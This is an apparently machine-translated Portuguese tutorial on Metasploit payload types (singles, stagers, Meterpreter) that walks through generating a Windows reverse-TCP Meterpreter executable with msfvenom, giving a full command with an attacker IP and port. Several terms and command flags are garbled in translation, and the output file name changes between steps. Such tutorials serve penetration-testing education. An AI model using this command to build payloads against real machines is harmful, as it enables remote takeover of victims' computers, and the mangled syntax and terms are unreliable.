A metasploit é uma das plataformas mais usadas para realizar testes de penetração, hackers e até jogos informais. Precisamos compreender como os componentes e cargas úteis funcionam para usá -las efetivamente. Em termos simplistas, uma carga útil é uma ação que deve ser executada quando uma exploração concluiu sua execução. Uma carga útil faz parte do código que a exploração executa. Explorações são usadas para obter acesso a um sistema e as cargas úteis realizam tarefas específicas. A metasploit tem muitas cargas úteis, como conchas reversas, conchas de ligação, medidor e outros. Várias cargas úteis funcionarão com mais explorações; No entanto, encontrar a carga útil adequada que funcionará com a exploração requer alguma investigação. Depois de decidir uma exploração, use o comando "Display Carcoads" do Metasploit para obter uma lista de cargas úteis que funcionarão com ele.
Tipos de cargas úteis
No metasploit, existem alguns tipos diferentes de cargas úteis. Esses três tipos básicos são os que você acabará por acabar usando mais:
Músicas
Os solteiros são extremamente pequenos e destinados a iniciar uma conversa antes de passar para outro estágio.
Estagiários
A carga útil usa o stager para estabelecer uma conexão de rede entre o sistema de destino e o processador de carga útil do servidor de metasploit. O stager permite carregar e inserir uma carga útil maior e mais complicada denominada estágio usando uma carga útil menor.
Meterpreter
O Meterpreter tornou -se uma carga útil de ataque de metasploit que fornece um fator de intruso que afeta como navegar e executar o código na máquina de destino. Meterpreter é um aplicativo somente de memória que não escreve para disco. O Meterpreter tentou se injetar no processo atacado, de onde pode passar para outros processos operacionais; Portanto, nenhum novo processo é gerado. O Meterpreter foi criado para evitar as desvantagens do uso de cargas úteis especializadas, permitindo a escrita de comandos e garantindo comunicação criptografada. A desvantagem do emprego de cargas úteis específicas é que os alarmes podem ser levantados se um processo mais novo iniciar em todo o sistema de destino.
Criando carga útil com metasploit no Kali Linux
Para criar carga útil com o metasploit no Kali Linux, siga todas as etapas descritas abaixo:
Etapa 1: Acessando o msfconsole
msfconsole é o único meio de acessar a maioria da funcionalidade do metasploit. msfconsole fornece à plataforma uma interface baseada em console. msfconsole tem sido a interface MSF com os melhores recursos e é o mais estável. A capacidade completa da readline, a tabbing e a conclusão de comando são todos fornecidos pelo MSFCONSOLE. Comandos externos podem ser executados no msfconsole. Use o seguinte comando declarado para acessar o msfconsole no kali linux.
$ msfconsole
Etapa 2: Acessando MSFVenom
A carga útil que fabricamos usando msfvenom será uma carga útil reversa de TCP. Essa carga útil cria um executável que, quando iniciado, estabelece uma conexão entre o computador do usuário e nosso manipulador de metasploit, permitindo -nos realizar uma sessão de Meterpreter. Use o seguinte comando declarado para acessar o msfvenom no kali linux.
$ msfvenom -p
Etapa 3: Criando carga útil
Use o seguinte comando declarado para criar uma carga útil no metasploit no Kali Linux.
$ msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.43.28 LPORT = 6001 -F EXE -O PAPAR.exe
Você pode usar a opção -p para indicar qual carga útil você deseja utilizar. LHOST parece ser o endereço IP do atacante ao qual você deseja que a carga útil vincule. LPORT é o mesmo que acima; Esta é a porta para a qual a carga útil se vinculará e deve ser configurada no manipulador. -f instrui o msfvenom como gerar a carga útil; Nesse caso, estamos indo para um programa executável ou exe. A carga útil criada pela execução do comando acima é 73802 bytes, como mostrado a partir da imagem acima mencionada.
Para verificar onde foi criado, navegaremos em direção ao diretório doméstico. Na captura de tela abaixo, você pode verificar se a carga.exe foi criado com sucesso.
Você pode verificar suas propriedades clicando duas vezes. O tamanho da carga útil criada é a mesma que foi mostrada na tela do terminal.
Conclusão
Este artigo forneceu uma breve introdução relacionada a cargas úteis e seus tipos. Seguimos instruções passo a passo para criar cargas úteis no metasploit no sistema operacional Kali Linux.